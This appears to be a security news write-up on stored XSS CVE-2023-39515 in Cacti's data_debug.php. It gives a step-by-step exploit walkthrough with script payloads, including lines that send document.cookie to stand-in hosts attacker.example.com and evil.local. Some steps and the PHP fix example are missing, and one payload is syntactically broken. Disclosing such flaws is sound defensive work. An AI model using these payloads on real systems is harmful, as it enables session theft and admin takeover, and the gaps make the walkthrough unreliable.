CVE CyberSecurity Database News

CVE-2023-39515 - How Stored XSS in Cacti’s data_debug.php Threatens Your NMS

Poster -

Cacti is a popular open source monitoring and fault management framework, widely used for keeping an eye on IT infrastructure. In 2023, a critical security hole—CVE-2023-39515—was discovered and patched. This flaw allowed *authenticated* attackers to store malicious scripts in the Cacti database, which would execute in the browsers of administrative users. If you’re managing a Cacti deployment (especially before version 1.2.25), this is a must-read.

Affected file: data_debug.php (debug info about data sources).

- Attack chain: An authenticated user with General Administration > Sites/Devices/Data permission creates a malicious data source path. When an admin visits the debug page, the injected script runs in their browser.

- References

- NVD CVE-2023-39515
- Cacti security advisory
- CENSUS Security Report

Targets: Anyone (especially admins) who views the poisoned data.

- Risk: Execute any JavaScript in the browser of privileged users (steal session, reset passwords, perform any admin actions via CSRF, etc).

Where’s the Bug?

The Cacti page at <HOST>/cacti/data_debug.php shows a lot of info about individual data sources, including configuration settings like the data source path.

In vulnerable versions, users with certain privileges could set the data source path to malicious code—*no HTML filtering or escaping* was enforced. Later, an admin visiting the debug page sees their browser parsing and executing this code.

Step-by-Step Exploit Walkthrough

Requirements:

Open the URL

http://<HOST>/cacti/data_sources.php

Find the "Data source path" field. Instead of a normal path, enter your attack payload, for example

"><script>alert('XSS from CVE-2023-39515!');</script>

![](https://i.imgur.com/vYZ16Yn.png)
*(Sample screenshot – not actual Cacti interface)*

*Be subtle! Real attackers might use code to steal cookies, exfiltrate data, or create hidden administrator accounts.*

3. Save the Malicious Data Source

Submit the form. The data source path (with your embedded script) is now stored in the database.

When an administrator visits the following for debugging

http://<HOST>/cacti/data_debug.php?id=<MALICIOUS_SOURCE_ID>;

The page displays the data source path, unsanitized. Your script runs in their browser context.

A real-life malicious payload might look like

"><script>
fetch('https://attacker.example.com/steal?cookie='+document.cookie);
// or, dynamically add an admin user via AJAX
</script>

Here's a simple attack workflow using Burp Suite, curl, or the browser

"><script>new Image().src='http://evil.local/c?'; + document.cookie;</script>

Upgrade Cacti: v1.2.25 or later includes a patch!

- Cacti Download Page
- Filter/escape output: If upgrade isn’t possible, *manually sanitize* any dynamic content in data_debug.php. For PHP, use:

References

- NVD Entry for CVE-2023-39515
- Cacti GHSA-q77c-q3x4-27g5 advisory
- CENSUS Labs vulnerability disclosure

Final Thoughts

Despite being a "stored XSS" (which requires some form of authentication), this bug is particularly dangerous in real-world environments where Cacti access may be given to multiple users (e.g., NOC operators). All it takes is a single malicious or compromised lower-privileged account to attack every admin.

Patch now, and always sanitize output!

If you liked this breakdown, share it with your Cacti admin friends—and sleep a little safer.

Timeline

Published on: 09/05/2023 21:15:47 UTC
Last modified on: 11/09/2023 05:15:10 UTC